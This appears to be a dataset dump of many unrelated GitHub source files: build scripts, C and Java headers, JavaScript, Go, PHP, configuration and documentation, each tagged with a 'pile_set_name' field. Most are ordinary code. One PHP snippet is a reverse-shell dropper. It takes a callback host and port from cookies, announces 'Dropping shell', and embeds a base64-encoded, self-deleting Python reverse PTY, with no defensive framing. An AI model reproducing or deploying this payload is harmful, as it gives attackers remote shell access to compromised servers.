text stringlengths 2 99.9k | meta dict |
|---|---|
add_definitions(-DUSE_WINE_TODOS)
add_executable(qedit_winetest mediadet.c timeline.c testlist.c qedit.rc)
set_module_type(qedit_winetest win32cui)
add_importlibs(qedit_winetest oleaut32 ole32 msvcrt kernel32)
add_rostests_file(TARGET qedit_winetest)
| {
"pile_set_name": "Github"
} |
#ifndef PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDRESS_H
#define PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDRESS_H
#include <stdint.h>
#define PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDR_TYPE_WOTS 0
#define PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDR_TYPE_WOTSPK 1
#define PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_AD... | {
"pile_set_name": "Github"
} |
define([
"dojo/_base/kernel",
"../main",
"dojo/_base/declare",
"dojo/_base/array",
"dojo/_base/lang",
"dojo/_base/event",
"dojo/dom-attr",
"dojo/dom-class",
"dojo/query",
"dojo/keys",
"dijit/tree/ForestStoreModel",
"./DataGrid",
"./_Layout",
"./_FocusManager",
"./_RowManager",
"./_EditManager",
"./Tree... | {
"pile_set_name": "Github"
} |
// Copyright (c) 2015-2020 Daniel Cooke
// Use of this source code is governed by the MIT license that can be found in the LICENSE file.
#ifndef vcf_extractor_hpp
#define vcf_extractor_hpp
#include <vector>
#include <memory>
#include <boost/filesystem.hpp>
#include <boost/optional.hpp>
#include "io/variant/vcf.hpp"... | {
"pile_set_name": "Github"
} |
// Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT.
// Package cloudsearchdomainiface provides an interface to enable mocking the Amazon CloudSearch Domain service client
// for testing your code.
//
// It is important to note that this interface will have breaking changes
// when the service model is... | {
"pile_set_name": "Github"
} |
// This file is part of Eigen, a lightweight C++ template library
// for linear algebra.
//
// Copyright (C) 2015 Gael Guennebaud <gael.guennebaud@inria.fr>
//
// This Source Code Form is subject to the terms of the Mozilla
// Public License v. 2.0. If a copy of the MPL was not distributed
// with this file, You can ob... | {
"pile_set_name": "Github"
} |
Introduction to Persistent Collections for Java
There are several ways to use the library:
1. Use instances of built-in persistent classes in your applications
2. Extend built-in persistent ... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>beforeRunningCommand</key>
<string>nop</string>
<key>command</key>
<string>#!/usr/bin/env sh
cat <<'RUBYEOF' > /tmp/ruby-amp-$$.rb
... | {
"pile_set_name": "Github"
} |
package org.hisp.dhis.trackedentityattributevalue;
/*
* Copyright (c) 2004-2020, University of Oslo
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* Redistributions of source code must ret... | {
"pile_set_name": "Github"
} |
// Contextual backgrounds
@mixin bg-variant($parent, $color) {
#{$parent} {
background-color: $color !important;
}
a#{$parent} {
@include hover-focus {
background-color: darken($color, 10%) !important;
}
}
}
| {
"pile_set_name": "Github"
} |
<pre>
<h1>Grade Your Vending Machine !</h1>
<div class="row">
<div class="small-12 medium-6 large-8 columns">
<p>In 2016, <a href="https://world.openfoodfacts.org/discover">Open Food Facts</a> goes a step further in helping informing the consumer. Thanks to the system of <a href="https://fr.blog.openfoodfacts.org/n... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="12120" systemVersion="16E195" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" colorMatched="YES" initialViewController="LX8-... | {
"pile_set_name": "Github"
} |
package com.simon.provider;
import org.apache.ibatis.jdbc.SQL;
import java.util.Map;
/**
* 侧边栏菜单权限
*
* @author simon
* @date 2019-01-14
**/
public class SideMenuAuthorityProvider {
/**
* 构造SQL查询语句
* @param param 查询条件
* @return SQL字符串
*/
public String getList(Map<String, Object> para... | {
"pile_set_name": "Github"
} |
/*
Copyright 2015 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, ... | {
"pile_set_name": "Github"
} |
"""
State Space Representation and Kalman Filter
Author: Chad Fulton
License: Simplified-BSD
"""
import contextlib
from warnings import warn
import numpy as np
from .representation import OptionWrapper, Representation, FrozenRepresentation
from .tools import reorder_missing_matrix, reorder_missing_vector
from . impo... | {
"pile_set_name": "Github"
} |
// RUN: llvm-mc -triple=aarch64 -show-encoding -mattr=+sve < %s \
// RUN: | FileCheck %s --check-prefixes=CHECK-ENCODING,CHECK-INST
// RUN: not llvm-mc -triple=aarch64 -show-encoding < %s 2>&1 \
// RUN: | FileCheck %s --check-prefix=CHECK-ERROR
// RUN: llvm-mc -triple=aarch64 -filetype=obj -mattr=+sve < %... | {
"pile_set_name": "Github"
} |
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
package com.azure.security.keyvault.administration.implementation;
import com.azure.core.credential.AccessToken;
import com.azure.core.credential.TokenRequestContext;
import reactor.core.publisher.FluxSink;
import reactor.... | {
"pile_set_name": "Github"
} |
/** @file ikmeans_elkan.tc
** @brief Integer K-Means - Elkan Algorithm - Definition
** @author Andrea Vedaldi
**/
/*
Copyright (C) 2007-12 Andrea Vedaldi and Brian Fulkerson.
All rights reserved.
This file is part of the VLFeat library and is made available under
the terms of the BSD license (see the COPYING file)... | {
"pile_set_name": "Github"
} |
var ListCache = require('./_ListCache'),
MapCache = require('./_MapCache');
/** Used as the size to enable large array optimizations. */
var LARGE_ARRAY_SIZE = 200;
/**
* Sets the stack `key` to `value`.
*
* @private
* @name set
* @memberOf Stack
* @param {string} key The key of the value to set.
* @param ... | {
"pile_set_name": "Github"
} |
// Copyright 2000-2020 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.intellij.ui;
import com.intellij.openapi.Disposable;
import com.intellij.openapi.ui.popup.Balloon;
import com.intellij.openapi.ui.popup.BalloonBuilder;
import com.int... | {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may ... | {
"pile_set_name": "Github"
} |
/**
* @author Qi Liu / https://github.com/lq3297401
*/
var JuicyCakeStyle = ( function () {
return {
color: {
surface: 0xCE26D4,
selected: 0xE8F000,
in: 0xF7BB2F,
out: 0xE155AB,
halo: 0xF9A6FF,
background: 0x000000
},... | {
"pile_set_name": "Github"
} |
import { Assertions } from '@ephox/agar';
import { UnitTest } from '@ephox/bedrock-client';
import { Arr } from '@ephox/katamari';
import * as Newlines from 'tinymce/plugins/paste/core/Newlines';
import PastePlugin from 'tinymce/plugins/paste/Plugin';
import Theme from 'tinymce/themes/silver/Theme';
UnitTest.test('ti... | {
"pile_set_name": "Github"
} |
<?php
include_once dirname(__FILE__) . '/../../../bootstrap/unit.php';
include_once dirname(__FILE__) . '/../../../bootstrap/database.php';
$t = new lime_test(4);
//------------------------------------------------------------
$t->diag('BannerImage: Cascading Delete');
$conn->beginTransaction();
$bannerImage = Doctr... | {
"pile_set_name": "Github"
} |
<?php
/**
*
* This file is part of Aura for PHP.
*
* @license http://opensource.org/licenses/bsd-license.php BSD
*
*/
namespace Aura\Filter\Failure;
use JsonSerializable;
/**
*
* Represents the failure of a rule specification.
*
* @package Aura.Filter
*
*/
class Failure implements JsonSerializable
{
/... | {
"pile_set_name": "Github"
} |
<window xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"
xmlns:html="http://www.w3.org/1999/xhtml"
class="reftest-wait">
<script type="text/javascript"><![CDATA[
function run() {
const XUL_NS = "http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul";
const ... | {
"pile_set_name": "Github"
} |
# Fri Nov 16 19:52:40 2018 -- reformated by PCGen PrettyLST v6.08.00
# CVS $Revision: $ $Author: $ -- Thu Nov 26 22:25:37 2015 -- reformated by PCGen PrettyLST v6.05.01
#SOURCELONG:Occult Adventures SOURCESHORT:OA SOURCEWEB:http://paizo.com/products/btpy9a0h
# Class feature types
# Ability Category Visible Edi... | {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2007 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by app... | {
"pile_set_name": "Github"
} |
-- This file should undo anything in `up.sql`
ALTER TABLE notifications ADD COLUMN title VARCHAR NOT NULL;
ALTER TABLE notifications ADD COLUMN content TEXT;
ALTER TABLE notifications ADD COLUMN link VARCHAR;
ALTER TABLE notifications ADD COLUMN data VARCHAR;
ALTER TABLE notifications DROP COLUMN kind;
ALTER TABLE not... | {
"pile_set_name": "Github"
} |
#! /usr/bin/env bash
set -e
[ -n "$TMUXIFIER_DEBUG" ] && set -x
# Load internal utility functions.
source "$TMUXIFIER/lib/util.sh"
# Provide tmuxifier help
if calling-help "$@"; then
echo "usage: tmuxifier load-window <layout_name | file_path>
Aliases: window, win, w
Create a new window using the specified window... | {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: efee954c69f0d421086729bb8df1137f
timeCreated: 1490044676
licenseType: Store
MonoImporter:
serializedVersion: 2
defaultReferences: []
executionOrder: -221
icon: {instanceID: 0}
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
Copyright (C) 2008 Happy Fish / YuQing
FastDFS may be copied only under the terms of the GNU General
Public License V3, which may be found in the FastDFS source kit.
Please visit the FastDFS Home Page for more detail.
Chinese language: http://www.fastken.com/
FastDFS is an open source high performance distributed fi... | {
"pile_set_name": "Github"
} |
{
"name": "methods",
"version": "1.1.0",
"description": "HTTP methods that node supports",
"main": "index.js",
"scripts": {
"test": "./node_modules/mocha/bin/mocha"
},
"keywords": [
"http",
"methods"
],
"author": {
"name": "TJ Holowaychuk"
},
"license": "MIT",
"repository": {
... | {
"pile_set_name": "Github"
} |
{
"name": "qs",
"description": "A querystring parser that supports nesting and arrays, with a depth limit",
"homepage": "https://github.com/ljharb/qs",
"version": "6.3.1",
"repository": {
"type": "git",
"url": "git+https://github.com/ljharb/qs.git"
},
"main": "lib/index.js",
"contributors": [
... | {
"pile_set_name": "Github"
} |
// This version targets C++11 and later.
//
// Copyright (C) 2016-2018 Martin Moene.
//
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
//
// expected lite is based on:
// A proposal to add a utility class to represen... | {
"pile_set_name": "Github"
} |
---
lang-ref: ch.07-3
title: 自动编码器的简介
lecturer: Alfredo Canziani
authors: Xinmeng Li, Atul Gandhi, Li Jiang, Xiao Li
date: 10 March 2020
lang: zh
translation-date: 20 June 2020
translator: Jonathan Sum
---
## [自动编码器的应用](https://www.youtube.com/watch?v=bggWQ14DD9M&t=55s)
### 图片生成
在图1,你可以去说出那一个脸对是假的吗?事实上,两个都是由StyleG... | {
"pile_set_name": "Github"
} |
---
title: Baseline
---
<div id="baseline" class="mb-large">
<h4><a href="#baseline">#baseline</a></h4>
<div style="height:calc(var(--spacing-base) * 20)" class="baseline bc-dark">
<div class="bc-secondary w-100 h-100"></div>
</div>
</div> | {
"pile_set_name": "Github"
} |
/*
* Copyright 2016, Stuart Douglas, and individual contributors as indicated
* by the @authors tag.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/lice... | {
"pile_set_name": "Github"
} |
// (C) Copyright John Maddock 2007.
// Use, modification and distribution are subject to the
// Boost Software License, Version 1.0. (See accompanying file
// LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
//
// This file is machine generated, do not edit by hand
// Unrolled polynomial ev... | {
"pile_set_name": "Github"
} |
$x: true;
@function foobar() {
@if $x {
$x: false;
@return foo;
}
@else {
$x: true;
@return bar;
}
}
div {
content: foobar();
content: foobar();
content: foobar();
content: foobar();
$x: false;
content: foobar();
} | {
"pile_set_name": "Github"
} |
#!/usr/bin/env python3
import logging
import math
from ast import literal_eval
import torch
import torch.nn as nn
import torch.nn.functional as F
from fairseq.models import (
FairseqEncoder,
register_model,
register_model_architecture,
transformer as fairseq_transformer,
)
from fairseq.modules import ... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>FILEHEADER</key>
<string>
/*
Copyright (c) ___YEAR___, Apple Inc. All rights reserved.
Redistribution and use in source and binary forms, ... | {
"pile_set_name": "Github"
} |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE.txt file in the root directory of this source tree.
import json
import logging
import os.path
import random
import time
import unittest
f... | {
"pile_set_name": "Github"
} |
from __future__ import absolute_import, division, unicode_literals
from six import unichr as chr
from collections import deque, OrderedDict
from sys import version_info
from .constants import spaceCharacters
from .constants import entities
from .constants import asciiLetters, asciiUpper2Lower
from .constants import ... | {
"pile_set_name": "Github"
} |
# This file is distributed under the same license as the Django package.
#
# Translators:
# Nurlan Rakhimzhanov <nurlan.rakhimzhanov@gmail.com>, 2011
# yun_man_ger <germanilyin@gmail.com>, 2011
msgid ""
msgstr ""
"Project-Id-Version: django\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2017-01-19 16:49+0100\n"
"PO-... | {
"pile_set_name": "Github"
} |
// Copyright 2000-2020 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.intellij.psi.search;
import com.intellij.openapi.project.Project;
import org.jetbrains.annotations.NotNull;
/**
* A {@code VirtualFile} that needs to be included in... | {
"pile_set_name": "Github"
} |
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>jQuery UI Dialog - Modal confirmation</title>
<link rel="stylesheet" href="../../themes/base/jquery.ui.all.css">
<script src="../../jquery-1.9.1.js"></script>
<script src="../../ui/jquery.ui.core.js"></script>
<script src="../../ui/jquery.ui.wi... | {
"pile_set_name": "Github"
} |
//===--- TerminalDisplayUnix.h - Output To UNIX Terminal --------*- C++ -*-===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===-------------------------------------------------------... | {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<title>403 Forbidden</title>
</head>
<body>
<p>Directory access is forbidden.</p>
</body>
</html>
| {
"pile_set_name": "Github"
} |
// This file is distributed under the MIT license.
// See the LICENSE file for details.
#pragma once
#ifndef VSNRAY_MEDIUM_H
#define VSNRAY_MEDIUM_H 1
#include "phase_function.h"
#include "spectrum.h"
namespace visionaray
{
template <typename T>
class anisotropic_medium
{
public:
using scalar_type = T;
publi... | {
"pile_set_name": "Github"
} |
/**
*
*/
package com.imooc.security.core.social.qq.api;
import org.apache.commons.lang.StringUtils;
import org.springframework.social.oauth2.AbstractOAuth2ApiBinding;
import org.springframework.social.oauth2.TokenStrategy;
import com.fasterxml.jackson.databind.ObjectMapper;
/**
* @author zhailiang
*
*/
public ... | {
"pile_set_name": "Github"
} |
# frozen_string_literal: true
require "test_helper"
class FormCore::Test < ActiveSupport::TestCase
test "truth" do
assert_kind_of Module, FormCore
end
end
| {
"pile_set_name": "Github"
} |
package org.standardnotes.notes.comms.data;
import java.util.ArrayList;
import java.util.List;
import javax.annotation.Generated;
import com.google.gson.annotations.Expose;
import com.google.gson.annotations.SerializedName;
/**
*
* <p>
*
*
*/
@Generated("org.jsonschema2pojo")
public class NoteContent {
... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<SampleMetadata>
<ID>EC6AC243-478A-4BC3-B456-7D6D81E19EA3</ID>
<Brief>Sample code for the Xamarin watchOS Complications documentation.</Brief>
<IsFullApplication>false</IsFullApplication>
<Level>Beginner</Level>
<Tags>iOS10, Watch, User Interface, Getting Started</Tags>
<Sup... | {
"pile_set_name": "Github"
} |
// Copyright 2015 Matthew Holt
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in... | {
"pile_set_name": "Github"
} |
# Untitled
| {
"pile_set_name": "Github"
} |
version: '2.1'
services:
php:
image: '7.1'
build:
args:
version: 7.1-cli
| {
"pile_set_name": "Github"
} |
/*
Copyright (C) 2015 - 2019 Electronic Arts Inc. All rights reserved.
This file is part of the Orbit Project <https://www.orbit.cloud>.
See license in LICENSE.
*/
package orbit.server.etcd
import io.etcd.jetcd.ByteSequence
import io.etcd.jetcd.Client
import io.etcd.jetcd.options.GetOption
import io.etcd.jetcd.o... | {
"pile_set_name": "Github"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build windows
// Package windows contains an interface to the low-level operating system
// primitives. OS details vary depending on the underlying system,... | {
"pile_set_name": "Github"
} |
/*
* jQuery UI Effects Slide 1.7.1
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Slide
*
* Depends:
* effects.core.js
*/
(function($) {
$.effects.slide =... | {
"pile_set_name": "Github"
} |
**Welcome to Documentation.** You can go ahead and delete this page whenever you're ready. It contains some information as well as being a good reference point for how things will be styled. Every page in Documentation is formatted with Markdown (although there are a couple of additions which are demonstrated here).
#... | {
"pile_set_name": "Github"
} |
/* Class = "NSTextFieldCell"; title = "Last Refreshed:"; ObjectID = "105"; */
"105.title" = "Sidst opdateret:";
/* Class = "NSButtonCell"; title = "Validate"; ObjectID = "109"; */
"109.title" = "Godkend";
/* Class = "NSTextFieldCell"; title = "User name:"; ObjectID = "111"; */
"111.title" = "Brugernavn:";
/* Class =... | {
"pile_set_name": "Github"
} |
export CGAL_DIR='/cygdrive/c/CGAL/reference_platforms/x64_Cygwin-Windows8_MSVC2010-Release-64bits'
export VC_VERSION="10"
export ARCH="64"
export PLATFORM_REFERENCE="/cygdrive/c/CGAL/reference_platforms"
source "${PLATFORM_REFERENCE}/setup_common"
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<base href="/">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>@ViewBag.Title - @T.Get("common.product")</title>
<environment names="Production">
<link rel="stylesheet" asp-append-version="true" href="@Url.... | {
"pile_set_name": "Github"
} |
package com.uber.rave.model;
import androidx.annotation.NonNull;
import androidx.annotation.Size;
import androidx.annotation.StringDef;
import com.uber.rave.AnnotationSpecs;
import com.uber.rave.ObjectCreator;
import com.uber.rave.ObjectCreatorIncrementer;
import com.uber.rave.StringCreator;
import com.uber.rave.anno... | {
"pile_set_name": "Github"
} |
library ieee;
use ieee.std_logic_1164.all;
use ieee.numeric_std_unsigned.all;
-- This module generates the pixel coordinates
-- for a 640x480 @ 60 Hz screen resolution.
-- This module expects an input clock frequency
-- of 25.175 MHz, but will work fine with 25.0 MHz.
entity pix is
port (
clk_i : in std_l... | {
"pile_set_name": "Github"
} |
/* crypto/mdc2/mdc2.h */
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-c... | {
"pile_set_name": "Github"
} |
name: test_backend
on:
push:
branches:
tags:
paths:
- '.github/workflows/ci-test-backend.yml'
- 'backend/**'
- '!backend/scripts/**'
pull_request:
paths:
- '.github/workflows/ci-test-backend.yml'
- 'backend/**'
- '!backend/scripts/**'
jobs:
backend:
runs-o... | {
"pile_set_name": "Github"
} |
/* $Id: capidrv.c,v 1.1.2.2 2004/01/12 23:17:24 keil Exp $
*
* ISDN4Linux Driver, using capi20 interface (kernelcapi)
*
* Copyright 1997 by Carsten Paeth <calle@calle.de>
*
* This software may be used and distributed according to the terms
* of the GNU General Public License, incorporated herein by reference.
*... | {
"pile_set_name": "Github"
} |
///** @file
//
// VFR to produce the formset used by BDS. This form only lists
// the Configure Required driver health instances.
//
// Copyright (c) 2013 - 2015, Intel Corporation. All rights reserved.<BR>
// SPDX-License-Identifier: BSD-2-Clause-Patent
//**/
#include "DriverHealthManagerVfr.h"
fo... | {
"pile_set_name": "Github"
} |
// This file is part of the AliceVision project.
// Copyright (c) 2016 AliceVision contributors.
// Copyright (c) 2012 openMVG contributors.
// This Source Code Form is subject to the terms of the Mozilla Public License,
// v. 2.0. If a copy of the MPL was not distributed with this file,
// You can obtain one at https:... | {
"pile_set_name": "Github"
} |
/*
FreeRTOS V9.0.0 - Copyright (C) 2016 Real Time Engineers Ltd.
All rights reserved
VISIT http://www.FreeRTOS.org TO ENSURE YOU ARE USING THE LATEST VERSION.
This file is part of the FreeRTOS distribution.
FreeRTOS is free software; you can redistribute it and/or modify it under
the terms of... | {
"pile_set_name": "Github"
} |
using UnityEngine;
using System.Collections;
public class BillboardLaub: MonoBehaviour {
private Transform mainCamTransform;
private Transform cachedTransform;
// Use this for initialization
void Start () {
mainCamTransform = Camera.main.transform;
cachedTransform = transform;
}
void Update(){
if (m... | {
"pile_set_name": "Github"
} |
/* Elementary Unicode string functions.
Copyright (C) 2001-2002, 2005-2019 Free Software Foundation, Inc.
This program is free software: you can redistribute it and/or modify it
under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 3 of the License, ... | {
"pile_set_name": "Github"
} |
base, turret, barrel1, firepoint1, dirt = piece('base', 'turret', 'barrel1', 'firepoint1', 'dirt')
local SIG_AIM = {}
-- state variables
isMoving = "isMoving"
terrainType = "terrainType"
function script.Create()
StartThread(common.SmokeUnit, {base, turret, barrel1})
end
common = include("headers/common_i... | {
"pile_set_name": "Github"
} |
//===-- Use.cpp - Implement the Use class ---------------------------------===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===-------------------------------------------------------... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?><!--
~ Copyright (c) 2014-2015 Luis M. Gallardo D.
~ All rights reserved. This program and the accompanying materials
~ are made available under the terms of the GNU Lesser General Public License v3.0
~ which accompanies this distribution, and is available at
~ ... | {
"pile_set_name": "Github"
} |
<?php
$cbhost = $_COOKIE['host'];
$cbport = $_COOKIE['port'];
echo "{+} Using ".$cbhost.":".$cbport." as callback...\n{+} Dropping shell...\n";
$shell =
"IyEvdXNyL2Jpbi9weXRob24yCiMgY29kaW5nOiB1dGYtOAojIFNlbGYgRGVzdHJ1Y3RpbmcsIERhZW1vbmluZyBSZXZlcnNlIFBUWS4KIyBybSdzIHNlbGYgb24gcXVpdCA6MwojIFRPRE86CiMgMTogQWRkIGNyeXB0b... | {
"pile_set_name": "Github"
} |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0) on Sun Jul 19 11:36:55 PDT 2015 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Uses of Class com.fasterxml.jac... | {
"pile_set_name": "Github"
} |
<?php
namespace Illuminate\Database\Schema;
class PostgresBuilder extends Builder
{
/**
* Determine if the given table exists.
*
* @param string $table
* @return bool
*/
public function hasTable($table)
{
[$schema, $table] = $this->parseSchemaAndTable($table);
$... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<document type="com.apple.InterfaceBuilder3.CocoaTouch.XIB" version="3.0" toolsVersion="9532" systemVersion="15B42" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES">
<dependencies>
<deployment ide... | {
"pile_set_name": "Github"
} |
// Copyright 2010-2020, Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of condit... | {
"pile_set_name": "Github"
} |
#ifndef CAFFE_CUDNN_SIGMOID_LAYER_HPP_
#define CAFFE_CUDNN_SIGMOID_LAYER_HPP_
#include "./cudnn.hpp"
#include "../sigmoid_layer.hpp"
namespace caffe {
#ifdef USE_CUDNN
/**
* @brief CuDNN acceleration of SigmoidLayer.
*/
class CuDNNSigmoidLayer : public SigmoidLayer {
public:
explicit CuDNNSigmoidLayer(const Lay... | {
"pile_set_name": "Github"
} |
/* Area: ffi_call
Purpose: Check return value double.
Limitations: none.
PR: none.
Originator: <andreast@gcc.gnu.org> 20050212 */
/* { dg-do run } */
#include "ffitest.h"
static double return_dbl(double dbl)
{
printf ("%f\n", dbl);
return 2 * dbl;
}
int main (void)
{
ffi_cif cif;
ffi_type *args[... | {
"pile_set_name": "Github"
} |
{
"id": "query.json#",
"type": "object",
"required": [
"name",
"value"
],
"properties": {
"name": {
"type": "string"
},
"value": {
"type": "string"
},
"comment": {
"type": "string"
}
}
}
| {
"pile_set_name": "Github"
} |
package ch.cyberduck.core.threading;
/*
* Copyright (c) 2002-2016 iterate GmbH. All rights reserved.
* https://cyberduck.io/
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either versi... | {
"pile_set_name": "Github"
} |
Please try again later
| {
"pile_set_name": "Github"
} |
<?php
namespace GuzzleHttp\Psr7;
use Psr\Http\Message\UriInterface;
/**
* PSR-7 URI implementation.
*
* @author Michael Dowling
* @author Tobias Schultze
* @author Matthew Weier O'Phinney
*/
class Uri implements UriInterface
{
private static $schemes = [
'http' => 80,
'https' => 443,
];... | {
"pile_set_name": "Github"
} |
<?php
namespace Foo\BarScoped {
class TestClass {
}
}
| {
"pile_set_name": "Github"
} |
"Some module"
license ("http://www.apache.org/licenses/LICENSE-2.0.html")
module org.eclipse.ceylon.compiler.typechecker.test.modulec "1" {
shared import "org.eclipse.ceylon.compiler.typechecker.test.moduled" "1";
} | {
"pile_set_name": "Github"
} |
#Inventor V1.0 ascii
Material {
ambientColor 0 0.03109788 0
diffuseColor 0 0.12245365 0
specularColor 0.35663385 0.35663385 0.35663385
emissiveColor 0 0 0
shininess 0.08108644
transparency 0
}
| {
"pile_set_name": "Github"
} |
---
Title: Verordnung über Verbraucherinformationen zu Kraftstoffverbrauch, CO 2 -Emissionen
und Stromverbrauch neuer Personenkraftwagen
jurabk: Pkw-EnVKV
layout: default
origslug: pkw-envkv
slug: pkw-envkv
---
# Verordnung über Verbraucherinformationen zu Kraftstoffverbrauch, CO 2 -Emissionen und Stromverbrauch ne... | {
"pile_set_name": "Github"
} |
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/objects.h>
#include <openssl/comp.h>
COMP_CTX *COMP_CTX_new(COMP_METHOD *meth)
{
COMP_CTX *ret;
if ((ret=(COMP_CTX *)OPENSSL_malloc(sizeof(COMP_CTX))) == NULL)
{
/* ZZZZZZZZZZZZZZZZ */
return(NULL);
}
memset(ret,0,sizeof(COMP_CTX... | {
"pile_set_name": "Github"
} |
/*
* This software is distributed under BSD 3-clause license (see LICENSE file).
*
* Author: Nanubala Gnana Sai
*/
#include <gtest/gtest.h>
#include <shogun/features/DenseFeatures.h>
#include <shogun/kernel/GaussianKernel.h>
#include <shogun/lib/SGVector.h>
#include <shogun/mathematics/linalg/LinalgNamespace.h>
#i... | {
"pile_set_name": "Github"
} |
#
# Makefile for the linux lock manager stuff
#
obj-$(CONFIG_LOCKD) += lockd.o
lockd-objs-y := clntlock.o clntproc.o clntxdr.o host.o svc.o svclock.o \
svcshare.o svcproc.o svcsubs.o mon.o xdr.o grace.o
lockd-objs-$(CONFIG_LOCKD_V4) += clnt4xdr.o xdr4.o svc4proc.o
lockd-objs := $(lockd-objs-y)
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you... | {
"pile_set_name": "Github"
} |
package com.sk89q.craftbook.mechanics.crafting;
import java.io.IOException;
import java.util.*;
import com.sk89q.craftbook.bukkit.util.CraftBookBukkitUtil;
import org.bukkit.inventory.ItemStack;
import com.sk89q.craftbook.bukkit.CraftBookPlugin;
import com.sk89q.craftbook.util.ItemSyntax;
import com.sk89q.craftbook.... | {
"pile_set_name": "Github"
} |
/* FileSaver.js
* A saveAs() FileSaver implementation.
* 1.3.2
* 2016-06-16 18:25:19
*
* By Eli Grey, http://eligrey.com
* License: MIT
* See https://github.com/eligrey/FileSaver.js/blob/master/LICENSE.md
*/
/*global self */
/*jslint bitwise: true, indent: 4, laxbreak: true, laxcomma: true, smarttabs: true, ... | {
"pile_set_name": "Github"
} |
/*
* Copyright 2010-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
